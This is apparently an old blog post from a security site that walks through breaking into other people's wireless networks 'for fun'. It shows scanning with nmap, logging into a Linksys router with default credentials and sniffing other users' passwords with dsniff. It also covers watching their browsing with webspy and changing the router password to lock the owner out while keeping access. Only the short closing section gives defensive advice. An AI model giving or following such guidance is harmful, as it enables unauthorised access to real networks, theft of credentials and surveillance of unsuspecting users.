Open source software security

Happy Hacking via Wireless

30 November -0001

Ok, so everyone has a wireless connection now, and *nobody* knows how to secure one. So why not have some fun with this? Try it out. You've got Linux on your laptop right? And a wireless card? Well you're good to go. If you live in an apartment building you can probably even try this out at home (and if not just go to your nearest Starbucks, Cosi, or other wireless enabled cofee shop). Turn off any wireless receivers you've got at home (Apple Air-Ports, Belkin wireless recievers, etc.). Next fire up your computer and see if you get an internet connection. If you do then you're in business. The first thing to do is figure out where you are. 'su' to root and issue an ifconfig -eth0 to get the IP address of your ethernet card. Likely you're going to get something like this:

[root@localhost jkeane]# ifconfig eth0
eth0      Link encap:Ethernet  HWaddr 00:30:F1:0F:F3:A4
          inet addr:192.168.1.101  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:8764 errors:576 dropped:576 overruns:0 frame:576
          TX packets:8343 errors:161 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:100
          RX bytes:9467422 (9.0 Mb)  TX bytes:1140032 (1.0 Mb)
          Interrupt:3 Base address:0x100

Looking at this IP address you'll notice I'm on a reserved Class C subnet. This is probably whatever the DHCP server on the wireless receiver gave me. The next step is to ping around and find other computers and the router. I got lucky and found the router at:

[root@localhost jkeane]# ping 192.168.1.1 -c 2
PING 192.168.1.1 (192.168.1.1) 56(84) bytes of data.
64 bytes from 192.168.1.1: icmp_seq=1 ttl=150 time=5.02 ms
64 bytes from 192.168.1.1: icmp_seq=2 ttl=150 time=2.93 ms

running an nmap didn't really give me any results:

[root@localhost jkeane]# nmap -sS -O 192.168.1.1

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Warning:  No TCP ports found open on this machine, 
OS detection will be MUCH less reliable
All 1523 scanned ports on *.*.**) are: closed
Too many fingerprints match this host for me to give an accurate OS guess
Nmap run completed -- 1 IP address (1 host up) scanned in 216 seconds

So the next step was to look for a web interface. When I entered http://192.168.1.1 into mozilla I got a command prompt asking me for a username and password for a 'Linksys BEF***** Wireless Router'. All I had to do was Google for 'Linksys default password' and sure enough the Linksys site gave me all sorts of helpful information (including advice to change my default password) ;) For instance, the default password is set to 'admin', so I cheerfully type in 'admin' for the username and 'admin' for the password and I got a management screen. The first thing I did was check the DHCP configuration to find out what IP's are being issued to clients. Seemed 192.168.1.100 to 192.168.1.150 were the default. At first it looked like 192.168.1.100 wasn't online (failed ping) so I went ahead and checked the Linksys DHCP client table (they're so helpful) and found out that a MAC address was in fact registered to 192.168.1.100. Nmap returned:

[root@localhost jkeane]# nmap -sS -O 192.168.1.100

Starting nmap V. 2.53 by fyodor@insecure.org ( www.insecure.org/nmap/ )
Note: Host seems down. If it is really up, but blocking our ping probes, try -P0
Nmap run completed -- 1 IP address (0 hosts up) scanned in 30 seconds

So the client probably has some sort of personal firewall. No matter, next step is to fire up dsniff. Dsniff will allow you to intercept usernames and passwords from any computers using the wireless connection. Basically all I have to do is either log the output to a file with:

[root@localhost jkeane]# dsniff >> dlog.txt

Installing dsniff is a bit tricky, but there are rpms for dnsiff and all the dependencies. Just leave dsniff on and sooner or later you're going to log some activity ;) Webspy is also a lot of fun for seeing what people are browsing on the target computer.

The real fun starts when you access the password administration screens on the Linksys administration site. Changing the password will prevent the actual owner from administrating the device (without doing a hardware reset, which most people who don't reset default passwords probably aren't going to be able to do), but allow an attacker to return to the device at will.

Analysis

Unfortunately this sort of attack is all too easy to accomplish and to defend against. Everyone should reset default passwords. In addition every wireless receiving device will allow you to set MAC filters. First log all the MAC addresses of the computers on your LAN. MAC addresses are conveniently stamped on almost all PCMCIA (or laptop) cards. You can also find out your MAC address on a Linux box using ifconfig (its the HWaddr) or using 'ipconfig /all' on a windows machine. Be sure to set up MAC filtering for your wireless network. Some wireless receivers also allow you encrypt information in transit or even set up an access password. You should use ALL of the options available for your particular device.